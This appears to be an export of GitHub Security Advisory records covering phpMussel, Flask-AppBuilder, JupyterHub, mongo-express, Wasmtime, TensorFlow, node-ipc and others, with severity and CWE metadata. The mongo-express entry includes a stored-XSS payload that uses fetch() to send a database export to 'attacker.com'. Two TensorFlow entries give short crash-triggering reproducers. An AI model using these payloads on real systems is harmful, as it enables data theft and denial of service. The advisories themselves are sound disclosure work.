* Join our discord (preferred): https://discord.gg/QevWabU | null | 2021-09-23T18:38:12Z | 2020-08-05T21:43:19Z | MODERATE | 6.8 | {'CWE-352'} | {'https://github.com/polaris-rbx/Polaris-React/security/advisories/GHSA-whrh-9j4q-g7ph', 'https://github.com/advisories/GHSA-whrh-9j4q-g7ph', 'https://snyk.io/vuln/SNYK-JS-POLARISWEBSITE-597473', 'https://www.barracuda.com/glossary/csrf', 'https://owasp.org/www-community/attacks/csrf', 'https://github.com/polaris-rbx/Polaris-React/commit/b64673d91e83c0737616a0770d8208727730808b', 'https://medium.com/cross-site-request-forgery-csrf/double-submit-cookie-pattern-65bb71d80d9f'} | null | {'https://github.com/polaris-rbx/Polaris-React/commit/b64673d91e83c0737616a0770d8208727730808b'} | {'https://github.com/polaris-rbx/Polaris-React/commit/b64673d91e83c0737616a0770d8208727730808b'} |
GHSA | GHSA-qr95-4mq5-r3fh | Phar unserialization vulnerability in phpMussel | ### Impact
_What kind of vulnerability is it? Who is impacted?_
Anyone using >= v1.0.0 < v1.6.0.
### Patches
_Has the problem been patched? What versions should users upgrade to?_
Yes. Upgrading to at least >= v1.6.0 will resolve the problem (though upgrading to v2, which is the current major version, would be preferable, seeing as v1 is kind of old now and will most likely be marked as EoL when v3 is released in the near future).
### Workarounds
_Is there a way for users to fix or remediate the vulnerability without upgrading?_
Yes. In the package's configuration, disable archive checking by setting `check_archives` to `false` (thus avoiding execution of the affected parts of the codebase entirely).
### References
_Are there any links users can visit to find out more?_
Yes. The vulnerability is documented at [SECURITY.md](https://github.com/phpMussel/phpMussel/security/policy) and also at [#167](https://github.com/phpMussel/phpMussel/issues/167).
### For more information
If you have any questions or comments about this advisory:
* Comment at the issue linked to this advisory, or..
* Contact [the package author](https://github.com/Maikuolan) ([082e6bc1046fab95](https://peegeepee.com/046FAB95)). | {'CVE-2020-4043'} | 2021-01-08T20:12:51Z | 2020-06-10T19:40:30Z | HIGH | 7.7 | {'CWE-502'} | {'https://github.com/advisories/GHSA-qr95-4mq5-r3fh', 'https://github.com/phpMussel/phpMussel/security/policy#currently-known-vulnerabilities', 'https://github.com/phpMussel/phpMussel/commit/97f25973433921c1f953430f32d3081adc4851a4', 'https://github.com/phpMussel/phpMussel/pull/173', 'https://github.com/phpMussel/phpMussel/issues/167', 'https://nvd.nist.gov/vuln/detail/CVE-2020-4043', 'https://github.com/phpMussel/phpMussel/security/advisories/GHSA-qr95-4mq5-r3fh'} | null | {'https://github.com/phpMussel/phpMussel/commit/97f25973433921c1f953430f32d3081adc4851a4'} | {'https://github.com/phpMussel/phpMussel/commit/97f25973433921c1f953430f32d3081adc4851a4'} |
GHSA | GHSA-2ccw-7px8-vmpf | Open Redirect in Flask-AppBuilder | Flask-AppBuilder is an application development framework built on top of Flask. Versions prior to 3.4.5 contain an open redirect vulnerability when using the database authentication login page. There are no known workarounds. Users are recommended to upgrade to version 3.4.5 or later.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Flask-AppBuilder](https://github.com/dpgaspar/Flask-AppBuilder)
| {'CVE-2022-24776'} | 2022-04-07T00:09:52Z | 2022-03-25T19:27:39Z | MODERATE | 6.1 | {'CWE-601'} | {'https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-2ccw-7px8-vmpf', 'https://github.com/dpgaspar/Flask-AppBuilder/releases/tag/v3.4.5', 'https://github.com/dpgaspar/Flask-AppBuilder/pull/1804/commits/5214d975ebad2ff32057443d2cc20fef1c04d0ea', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24776', 'https://github.com/dpgaspar/Flask-AppBuilder/pull/1804', 'https://github.com/advisories/GHSA-2ccw-7px8-vmpf'} | null | {'https://github.com/dpgaspar/Flask-AppBuilder/pull/1804/commits/5214d975ebad2ff32057443d2cc20fef1c04d0ea'} | {'https://github.com/dpgaspar/Flask-AppBuilder/pull/1804/commits/5214d975ebad2ff32057443d2cc20fef1c04d0ea'} |
GHSA | GHSA-cg54-gpgr-4rm6 | user-readable api tokens in systemd units for JupyterHub | ### Impact
user API tokens issued to single-user servers are specified in the environment of systemd units, which are accessible to all users.
In particular, the-littlest-jupyterhub is affected, which uses systemdspawner by default.
### Patches
Patched in jupyterhub-systemdspawner v0.15
### Workarounds
No workaround other than upgrading systemdspawner to 0.15
### For more information
If you have any questions or comments about this advisory:
* Open a thread in [the Jupyter forum](https://discourse.jupyter.org)
* Email us at [security@ipython.org](mailto:security@ipython.org) | {'CVE-2020-26261'} | 2022-04-19T19:02:42Z | 2020-12-09T16:27:43Z | HIGH | 7.9 | {'CWE-668'} | {'https://pypi.org/project/jupyterhub-systemdspawner/', 'https://github.com/jupyterhub/systemdspawner/blob/master/CHANGELOG.md#v015', 'https://github.com/advisories/GHSA-cg54-gpgr-4rm6', 'https://nvd.nist.gov/vuln/detail/CVE-2020-26261', 'https://github.com/jupyterhub/systemdspawner/security/advisories/GHSA-cg54-gpgr-4rm6', 'https://github.com/jupyterhub/systemdspawner/commit/a4d08fd2ade1cfd0ef2c29dc221e649345f23580'} | null | {'https://github.com/jupyterhub/systemdspawner/commit/a4d08fd2ade1cfd0ef2c29dc221e649345f23580'} | {'https://github.com/jupyterhub/systemdspawner/commit/a4d08fd2ade1cfd0ef2c29dc221e649345f23580'} |
GHSA | GHSA-7p8h-86p5-wv3p | Cross-site scripting | Two kinds of XSS were found:
1. As mentioned in https://github.com/mongo-express/mongo-express/issues/577 when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell.
2. Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc.
### Impact
As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload:
```JSON
{"someField": "long string here to surpass the limit of document ...... <script> await fetch('http://localhost:8081/db/testdb/export/users').then( async res => await fetch('http://attacker.com?backup='+encodeURIComponent((await res.text())))) </script>" }
```
This will send an export of a collection to the attacker without even admin knowing. Other types of attacks such as dropping a database\collection are also possible.
### Patches
Upgrade to `v1.0.0-alpha.4`
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [mongo-express](https://github.com/mongo-express/mongo-express/issues/new)
* Email me at [jafar.akhoondali@gmail.com](mailto:jafar.akhoondali@gmail.com)
| {'CVE-2021-21422'} | 2022-04-19T19:03:00Z | 2021-06-28T17:18:04Z | HIGH | 8.1 | {'CWE-79'} | {'https://github.com/mongo-express/mongo-express/security/advisories/GHSA-7p8h-86p5-wv3p', 'https://github.com/advisories/GHSA-7p8h-86p5-wv3p', 'https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21422', 'https://github.com/mongo-express/mongo-express/issues/577'} | null | {'https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b'} | {'https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b'} |
GHSA | GHSA-4873-36h9-wv49 | Out-of-bounds read/write and invalid free with `externref`s and GC safepoints in Wasmtime | ### Impact
There was an invalid free and out-of-bounds read and write bug when running Wasm that uses `externref`s in Wasmtime.
To trigger this bug, Wasmtime needs to be running Wasm that uses `externref`s, the host creates non-null `externrefs`, Wasmtime performs a garbage collection (GC), and there has to be a Wasm frame on the stack that is at a GC safepoint where
* there are no live references at this safepoint, and
* there is a safepoint with live references earlier in this frame's function.
Under this scenario, Wasmtime would incorrectly use the GC stack map for the safepoint from earlier in the function instead of the empty safepoint. This would result in Wasmtime treating arbitrary stack slots as `externref`s that needed to be rooted for GC. At the *next* GC, it would be determined that nothing was referencing these bogus `externref`s (because nothing could ever reference them, because they are not really `externref`s) and then Wasmtime would deallocate them and run `<ExternRef as Drop>::drop` on them. This results in a free of memory that is not necessarily on the heap (and shouldn't be freed at this moment even if it was), as well as potential out-of-bounds reads and writes.
Even though support for `externref`s (via the reference types proposal) is enabled by default, unless you are creating non-null `externref`s in your host code or explicitly triggering GCs, you cannot be affected by this bug.
We have reason to believe that the effective impact of this bug is relatively small because usage of `externref` is currently quite rare.
### Patches
This bug has been patched and users should upgrade to Wasmtime version 0.30.0.
Additionally, we have updated [our primary `externref` fuzz target](https://github.com/bytecodealliance/wasmtime/blob/37c094faf53f1b356aab3c79d451395e4f7edb34/fuzz/fuzz_targets/table_ops.rs) such that it better exercises these code paths and we can have greater confidence in their correctness going forward.
### Workarounds
If you cannot upgrade Wasmtime at this time, you can avoid this bug by disabling the reference types proposal by passing `false` to [`wasmtime::Config::wasm_reference_types`](https://docs.rs/wasmtime/0.29.0/wasmtime/struct.Config.html#method.wasm_reference_types)
### References
* [The Wasm reference types proposal, which introduces `externref`](https://github.com/WebAssembly/reference-types/)
### For more information
If you have any questions or comments about this advisory:
* Reach out to us on [the Bytecode Alliance Zulip chat](https://bytecodealliance.zulipchat.com/#narrow/stream/217126-wasmtime)
* Open an issue in [the `bytecodealliance/wasmtime` repository](https://github.com/bytecodealliance/wasmtime/) | {'CVE-2021-39218'} | 2022-04-19T19:03:08Z | 2021-09-20T19:54:16Z | MODERATE | 6.3 | {'CWE-590', 'CWE-787', 'CWE-125'} | {'https://crates.io/crates/wasmtime', 'https://github.com/advisories/GHSA-4873-36h9-wv49', 'https://github.com/bytecodealliance/wasmtime/commit/398a73f0dd862dbe703212ebae8e34036a18c11c', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAVBRYDDUIY2ZR3K3FO4BVYJKIMJ5TP7/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z2Z33FTXFQ6EOINVEQIP4DFBG53G5XIY/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39218', 'https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-4873-36h9-wv49'} | null | {'https://github.com/bytecodealliance/wasmtime/commit/398a73f0dd862dbe703212ebae8e34036a18c11c'} | {'https://github.com/bytecodealliance/wasmtime/commit/398a73f0dd862dbe703212ebae8e34036a18c11c'} |
GHSA | GHSA-3q6f-8grx-pr4v | Cross-site scripting in jspdf | "It's possible to use nested script tags in order to bypass the filtering regex." | {'CVE-2020-7691'} | 2021-05-11T16:43:52Z | 2021-05-11T16:43:52Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/advisories/GHSA-3q6f-8grx-pr4v', 'https://github.com/MrRio/jsPDF/commit/d0323215b1a1cd1c35bf2b213274ae1e4797715d', 'https://github.com/MrRio/jsPDF/issues/2971', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-575255', 'https://snyk.io/vuln/SNYK-JS-JSPDF-568273', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7691', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-575253', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBMRRIO-575254', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-575252'} | null | {'https://github.com/MrRio/jsPDF/commit/d0323215b1a1cd1c35bf2b213274ae1e4797715d'} | {'https://github.com/MrRio/jsPDF/commit/d0323215b1a1cd1c35bf2b213274ae1e4797715d'} |
GHSA | GHSA-qf2g-q4mc-w7rr | Cross-site Scripting in Fork CMS | Fork CMS prior to 5.11.1 is vulnerable to stored cross-site scripting. When uploading a new module, the description of the module can contain JavaScript code. The JavaScript code may be executed after uploading the new module and looking at the `Details` page. | {'CVE-2022-0145'} | 2022-03-30T21:04:26Z | 2022-03-25T00:00:34Z | MODERATE | 5.4 | {'CWE-79'} | {'https://huntr.dev/bounties/b5b8c680-3cd9-4477-bcd9-3a29657ba7ba', 'https://github.com/advisories/GHSA-qf2g-q4mc-w7rr', 'https://github.com/forkcms/forkcms/commit/981730f1a3d59b423ca903b1f4bf79b848a1766e', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0145'} | null | {'https://github.com/forkcms/forkcms/commit/981730f1a3d59b423ca903b1f4bf79b848a1766e'} | {'https://github.com/forkcms/forkcms/commit/981730f1a3d59b423ca903b1f4bf79b848a1766e'} |
GHSA | GHSA-49q3-8867-5wmp | Remote Command Execution in reg-keygen-git-hash-plugin | ### Impact
`reg-keygen-git-hash-plugin` through 0.10.15 allow remote attackers to execute of arbitrary commands.
### Patches
Upgrade to version 0.10.16 or later.
### For more information
If you have any questions or comments about this advisory:
- Open an issue in [reg-viz/reg-suit](https://github.com/reg-viz/reg-suit)
| {'CVE-2021-32673'} | 2022-04-19T19:02:59Z | 2021-06-08T18:47:06Z | HIGH | 8.8 | {'CWE-94', 'CWE-78'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-32673', 'https://github.com/advisories/GHSA-49q3-8867-5wmp', 'https://github.com/reg-viz/reg-suit/releases/tag/v0.10.16', 'https://www.npmjs.com/package/reg-keygen-git-hash-plugin', 'https://github.com/reg-viz/reg-suit/security/advisories/GHSA-49q3-8867-5wmp', 'https://github.com/reg-viz/reg-suit/commit/f84ad9c7a22144d6c147dc175c52756c0f444d87'} | null | {'https://github.com/reg-viz/reg-suit/commit/f84ad9c7a22144d6c147dc175c52756c0f444d87'} | {'https://github.com/reg-viz/reg-suit/commit/f84ad9c7a22144d6c147dc175c52756c0f444d87'} |
GHSA | GHSA-8pmx-p244-g88h | Interpreter crash from `tf.io.decode_raw` | ### Impact
The implementation of `tf.io.decode_raw` produces incorrect results and crashes the Python interpreter when combining `fixed_length` and wider datatypes.
```python
import tensorflow as tf
tf.io.decode_raw(tf.constant(["1","2","3","4"]), tf.uint16, fixed_length=4)
```
The [implementation of the padded version](https://github.com/tensorflow/tensorflow/blob/1d8903e5b167ed0432077a3db6e462daf781d1fe/tensorflow/core/kernels/decode_padded_raw_op.cc) is buggy due to a confusion about pointer arithmetic rules.
First, the code [computes](https://github.com/tensorflow/tensorflow/blob/1d8903e5b167ed0432077a3db6e462daf781d1fe/tensorflow/core/kernels/decode_padded_raw_op.cc#L61) the width of each output element by dividing the `fixed_length` value to the size of the type argument:
```cc
int width = fixed_length / sizeof(T);
```
The `fixed_length` argument is also used to determine the [size needed for the output tensor](https://github.com/tensorflow/tensorflow/blob/1d8903e5b167ed0432077a3db6e462daf781d1fe/tensorflow/core/kernels/decode_padded_raw_op.cc#L63-L79):
```cc
TensorShape out_shape = input.shape();
out_shape.AddDim(width);
Tensor* output_tensor = nullptr;
OP_REQUIRES_OK(context, context->allocate_output("output", out_shape, &output_tensor));
auto out = output_tensor->flat_inner_dims<T>();
T* out_data = out.data();
memset(out_data, 0, fixed_length * flat_in.size());
```
This is followed by [reencoding code](https://github.com/tensorflow/tensorflow/blob/1d8903e5b167ed0432077a3db6e462daf781d1fe/tensorflow/core/kernels/decode_padded_raw_op.cc#L85-L94):
```cc
for (int64 i = 0; i < flat_in.size(); ++i) {
const T* in_data = reinterpret_cast<const T*>(flat_in(i).data());
if (flat_in(i).size() > fixed_length) {
memcpy(out_data, in_data, fixed_length);
} else {
memcpy(out_data, in_data, flat_in(i).size());
}
out_data += fixed_length;
}
```
The erroneous code is the last line above: it is moving the `out_data` pointer by `fixed_length * sizeof(T)` bytes whereas it only copied at most `fixed_length` bytes from the input. This results in parts of the input not being decoded into the output.
Furthermore, because the pointer advance is far wider than desired, this quickly leads to writing to outside the bounds of the backing data. This OOB write leads to interpreter crash in the reproducer mentioned here, but more severe attacks can be mounted too, given that this gadget allows writing to periodically placed locations in memory.
### Patches
We have patched the issue in GitHub commit [698e01511f62a3c185754db78ebce0eee1f0184d](https://github.com/tensorflow/tensorflow/commit/698e01511f62a3c185754db78ebce0eee1f0184d).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. | {'CVE-2021-29614'} | 2022-04-26T18:09:06Z | 2021-05-21T14:28:42Z | HIGH | 7.1 | {'CWE-665', 'CWE-787'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-29614', 'https://github.com/tensorflow/tensorflow/commit/698e01511f62a3c185754db78ebce0eee1f0184d', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-8pmx-p244-g88h', 'https://github.com/advisories/GHSA-8pmx-p244-g88h'} | null | {'https://github.com/tensorflow/tensorflow/commit/698e01511f62a3c185754db78ebce0eee1f0184d'} | {'https://github.com/tensorflow/tensorflow/commit/698e01511f62a3c185754db78ebce0eee1f0184d'} |
GHSA | GHSA-fxmx-pfm2-85m2 | Cross-site Scripting in Ericsson CodeChecker | In Ericsson CodeChecker prior to 6.18.2, a Stored Cross-site scripting (XSS) vulnerability in the comments component of the reports viewer allows remote attackers to inject arbitrary web script or HTML via the POST JSON data of the /CodeCheckerService API. | {'CVE-2021-44217'} | 2022-01-21T23:32:32Z | 2022-01-21T23:32:32Z | MODERATE | 0 | {'CWE-79'} | {'https://github.com/advisories/GHSA-fxmx-pfm2-85m2', 'https://user-images.githubusercontent.com/9525971/142965091-e118b012-a7fc-4c2f-ad0c-80aeed6f7ec9.png', 'https://github.com/Ericsson/codechecker/commit/72ee51158e6d81150320223b85410c179b9ee2b1', 'https://github.com/Ericsson/codechecker/releases/tag/v6.18.2', 'https://github.com/Hyperkopite/CVE-2021-44217/blob/main/README.md', 'https://github.com/Ericsson/codechecker/pull/3549', 'https://nvd.nist.gov/vuln/detail/CVE-2021-44217', 'https://codechecker-demo.eastus.cloudapp.azure.com/'} | null | {'https://github.com/Ericsson/codechecker/commit/72ee51158e6d81150320223b85410c179b9ee2b1'} | {'https://github.com/Ericsson/codechecker/commit/72ee51158e6d81150320223b85410c179b9ee2b1'} |
GHSA | GHSA-wh69-wc6q-7888 | Command injection in node-dns-sync | dns-sync through 0.2.0 allows execution of arbitrary commands . This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. | {'CVE-2020-11079'} | 2021-11-04T17:08:10Z | 2020-05-28T18:42:59Z | HIGH | 8.6 | {'CWE-94', 'CWE-77'} | {'https://github.com/skoranga/node-dns-sync/security/advisories/GHSA-wh69-wc6q-7888', 'https://nvd.nist.gov/vuln/detail/CVE-2020-11079', 'https://github.com/skoranga/node-dns-sync/commit/cb10a5ac7913eacc031ade7d91596277f31645dc', 'https://github.com/advisories/GHSA-wh69-wc6q-7888'} | null | {'https://github.com/skoranga/node-dns-sync/commit/cb10a5ac7913eacc031ade7d91596277f31645dc'} | {'https://github.com/skoranga/node-dns-sync/commit/cb10a5ac7913eacc031ade7d91596277f31645dc'} |
GHSA | GHSA-m4hf-j54p-p353 | Type confusion leading to segfault in Tensorflow | ### Impact
The [implementation of shape inference for `ConcatV2`](https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/framework/common_shape_fns.cc#L1961-L2059) can be used to trigger a denial of service attack via a segfault caused by a type confusion:
```python
import tensorflow as tf
@tf.function
def test():
y = tf.raw_ops.ConcatV2(
values=[[1,2,3],[4,5,6]],
axis = 0xb500005b)
return y
test()
```
The `axis` argument is translated into `concat_dim` in the `ConcatShapeHelper` helper function. Then, a value for `min_rank` is computed based on `concat_dim`. This is then used to validate that the `values` tensor has at least the required rank:
```cc
int64_t concat_dim;
if (concat_dim_t->dtype() == DT_INT32) {
concat_dim = static_cast<int64_t>(concat_dim_t->flat<int32>()(0));
} else {
concat_dim = concat_dim_t->flat<int64_t>()(0);
}
// Minimum required number of dimensions.
const int min_rank = concat_dim < 0 ? -concat_dim : concat_dim + 1;
// ...
ShapeHandle input = c->input(end_value_index - 1);
TF_RETURN_IF_ERROR(c->WithRankAtLeast(input, min_rank, &input));
```
However, [`WithRankAtLeast`](https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/framework/shape_inference.cc#L345-L358) receives the lower bound as a 64-bits value and then compares it against the maximum 32-bits integer value that could be represented:
```cc
Status InferenceContext::WithRankAtLeast(ShapeHandle shape, int64_t rank,
ShapeHandle* out) {
if (rank > kint32max) {
return errors::InvalidArgument("Rank cannot exceed kint32max");
}
// ...
}
```
Due to the fact that `min_rank` is a 32-bits value and the value of `axis`, the `rank` argument is a [negative value](https://godbolt.org/z/Gcr5haMob), so the error check is bypassed.
### Patches
We have patched the issue in GitHub commit [08d7b00c0a5a20926363849f611729f53f3ec022](https://github.com/tensorflow/tensorflow/commit/08d7b00c0a5a20926363849f611729f53f3ec022).
The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Yu Tian of Qihoo 360 AIVul Team. | {'CVE-2022-21731'} | 2022-02-11T17:05:51Z | 2022-02-10T00:19:50Z | MODERATE | 6.5 | {'CWE-754', 'CWE-843'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-21731', 'https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/framework/common_shape_fns.cc#L1961-L2059', 'https://github.com/tensorflow/tensorflow/commit/08d7b00c0a5a20926363849f611729f53f3ec022', 'https://github.com/advisories/GHSA-m4hf-j54p-p353', 'https://github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/framework/shape_inference.cc#L345-L358', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m4hf-j54p-p353'} | null | {'https://github.com/tensorflow/tensorflow/commit/08d7b00c0a5a20926363849f611729f53f3ec022'} | {'https://github.com/tensorflow/tensorflow/commit/08d7b00c0a5a20926363849f611729f53f3ec022'} |
GHSA | GHSA-97m3-w2cp-4xx6 | Embedded Malicious Code in node-ipc | The package node-ipc versions 10.1.1 and 10.1.2 are vulnerable to embedded malicious code that was introduced by the maintainer. The malicious code was intended to overwrite arbitrary files dependent upon the geo-location of the user IP address. The maintainer removed the malicious code in version 10.1.3. | {'CVE-2022-23812'} | 2022-04-15T13:11:55Z | 2022-03-16T23:54:32Z | CRITICAL | 9.8 | {'CWE-94', 'CWE-506'} | {'https://github.com/advisories/GHSA-97m3-w2cp-4xx6', 'https://github.com/RIAEvangelist/node-ipc/issues/233', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23812', 'https://github.com/RIAEvangelist/node-ipc/issues/236', 'https://security.netapp.com/advisory/ntap-20220407-0005/', 'https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370', 'https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js', 'https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580'} | null | {'https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580'} | {'https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580'} |
GHSA | GHSA-r9q4-w3fm-wrm2 | Cross-Site Scripting in google-closure-library | Versions of `google-closure-library` prior to 20190301.0.0 are vulnerable to Cross-Site Scripting. The `safedomtreeprocessor.processToString()` function improperly processed empty elements, which could allow attackers to execute arbitrary JavaScript through Mutation Cross-Site Scripting.
## Recommendation
Upgrade to version 20190301.0.0 or later. | null | 2021-09-27T21:01:49Z | 2020-09-02T21:21:43Z | MODERATE | 0 | {'CWE-79'} | {'https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa#commitcomment-33294853', 'https://www.npmjs.com/advisories/878', 'https://snyk.io/vuln/SNYK-JS-GOOGLECLOSURELIBRARY-174519', 'https://github.com/advisories/GHSA-r9q4-w3fm-wrm2'} | null | {'https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa'} | {'https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa'} |
GHSA | GHSA-jf9v-q8vh-3fmc | Cross-site scripting in ICEcoder | In ICEcoder 8.0 allows, a reflected XSS vulnerability was identified in the multipe-results.php page due to insufficient sanitization of the _GET['replace'] variable. As a result, arbitrary Javascript code can get executed. | {'CVE-2021-32106'} | 2021-09-09T17:11:11Z | 2021-09-09T17:11:11Z | MODERATE | 5.4 | {'CWE-79'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-32106', 'https://github.com/icecoder/ICEcoder', 'https://github.com/advisories/GHSA-jf9v-q8vh-3fmc', 'https://prophaze.com/cve/icecoder-8-0-multipe-results-php-replace-cross-site-scripting/', 'https://github.com/icecoder/ICEcoder/commit/21d6ae0f2a3fce7d076ae430d48f5df56bd0f256', 'https://groups.google.com/g/icecoder/c/xcAc8_1UPxQ'} | null | {'https://github.com/icecoder/ICEcoder/commit/21d6ae0f2a3fce7d076ae430d48f5df56bd0f256'} | {'https://github.com/icecoder/ICEcoder/commit/21d6ae0f2a3fce7d076ae430d48f5df56bd0f256'} |
GHSA | GHSA-p8q8-jfcv-g2h2 | Directory Traversal in Archive_Tar | In Archive_Tar before 1.4.14, symlinks can refer to targets outside of the extracted archive, a different vulnerability than CVE-2020-36193. | {'CVE-2021-32610'} | 2021-09-27T18:46:37Z | 2021-08-09T20:40:06Z | HIGH | 7.1 | {'CWE-59'} | {'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VJQQYDAOWHD6RDITDRPHFW7WY6BS3V5N/', 'https://github.com/pear/Archive_Tar/commit/7789ebb2f34f9e4adb3a4152ad0d1548930a9755', 'https://lists.debian.org/debian-lts-announce/2021/07/msg00023.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42GPGVVFTLJYAKRI75IVB5R45NYQGEUR/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G5LTY6COQYNMMHQJ3QIOJHEWCKD4XDFH/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32610', 'https://github.com/pear/Archive_Tar/commit/b5832439b1f37331fb4f87e67fe4f', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CAODVMHGL5MHQWQAQTXQ7G7OE3VQZ7LS/', 'https://github.com/pear/Archive_Tar/releases/tag/1.4.14', 'https://github.com/advisories/GHSA-p8q8-jfcv-g2h2', 'https://www.drupal.org/sa-core-2021-004'} | null | {'https://github.com/pear/Archive_Tar/commit/7789ebb2f34f9e4adb3a4152ad0d1548930a9755', 'https://github.com/pear/Archive_Tar/commit/b5832439b1f37331fb4f87e67fe4f'} | {'https://github.com/pear/Archive_Tar/commit/7789ebb2f34f9e4adb3a4152ad0d1548930a9755', 'https://github.com/pear/Archive_Tar/commit/b5832439b1f37331fb4f87e67fe4f'} |
GHSA | GHSA-894g-6j7q-2hx6 | Cross site scripting in flask-admin | helpers.py in Flask-Admin 1.5.2 has Reflected XSS via a crafted URL. | {'CVE-2018-16516'} | 2022-03-26T00:47:38Z | 2018-12-19T19:23:52Z | MODERATE | 6.1 | {'CWE-79'} | {'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJIYCWIH3BRLI2QNC53CQXLKVP27X7EH/', 'https://github.com/flask-admin/flask-admin/pull/1699', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16516', 'https://github.com/flask-admin/flask-admin/releases/tag/v1.5.3', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZU2VKULURVXEU4YFTLMBQGYMPSXQ4MBN/', 'https://github.com/advisories/GHSA-894g-6j7q-2hx6', 'https://github.com/flask-admin/flask-admin/commit/8af10e0b022464fdcb2da3d0ea5bbd2f11c0acd1'} | null | {'https://github.com/flask-admin/flask-admin/commit/8af10e0b022464fdcb2da3d0ea5bbd2f11c0acd1'} | {'https://github.com/flask-admin/flask-admin/commit/8af10e0b022464fdcb2da3d0ea5bbd2f11c0acd1'} |
GHSA | GHSA-hvr8-466p-75rh | Integer overflow discovered in Pillow | Integer overflow in the ImagingResampleHorizontal function in libImaging/Resample.c in Pillow before 3.1.1 allows remote attackers to have unspecified impact via negative values of the new size, which triggers a heap-based buffer overflow. | {'CVE-2016-4009'} | 2022-04-26T18:16:33Z | 2018-07-24T20:15:48Z | CRITICAL | 9.8 | {'CWE-119'} | {'https://security.gentoo.org/glsa/201612-52', 'https://github.com/advisories/GHSA-hvr8-466p-75rh', 'http://www.securityfocus.com/bid/86064', 'https://github.com/python-pillow/Pillow/pull/1714', 'https://github.com/python-pillow/Pillow/commit/4e0d9b0b9740d258ade40cce248c93777362ac1e', 'https://github.com/python-pillow/Pillow/blob/c3cb690fed5d4bf0c45576759de55d054916c165/CHANGES.rst', 'https://nvd.nist.gov/vuln/detail/CVE-2016-4009'} | null | {'https://github.com/python-pillow/Pillow/commit/4e0d9b0b9740d258ade40cce248c93777362ac1e'} | {'https://github.com/python-pillow/Pillow/commit/4e0d9b0b9740d258ade40cce248c93777362ac1e'} |
